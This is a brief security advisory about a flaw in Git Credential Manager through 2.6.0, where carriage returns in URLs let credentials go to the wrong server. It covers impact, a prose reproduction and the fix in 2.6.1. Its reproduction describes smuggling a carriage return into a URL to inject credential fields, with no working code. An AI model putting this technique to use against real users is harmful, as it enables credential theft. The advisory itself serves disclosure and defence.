Git Credential Manager Carriage Return Handling Vulnerability Allows Credential Injection

A vulnerability exists in Git Credential Manager (GCM) due to improper handling of Carriage Return characters in URLs. This issue arises because Git and GCM interpret newlines differently, leading to a scenario where credentials for one server can be mistakenly sent to another. The vulnerability affects GCM versions through 2.6.0 and has been patched in 2.6.1. Users are advised to upgrade or, if unable to do so, to avoid cloning from untrusted URLs, especially with the recursive option.

Impact

Exploitation of this vulnerability allows for the injection of credentials into the wrong server, potentially leading to unauthorized access.

Reproduction

The vulnerability can be reproduced by crafting a URL that includes a Carriage Return character, which GCM will interpret as a newline. When this URL is used in a Git command that requires authentication, GCM will incorrectly parse the credentials and send them to the specified server. This can be automated with a script or tool that interacts with Git and GCM, such as a package manager or a Git submodule update.

Remediation

Users should upgrade to Git Credential Manager version 2.6.1. Instructions for upgrading can be found in the Git Credential Manager repository on GitHub.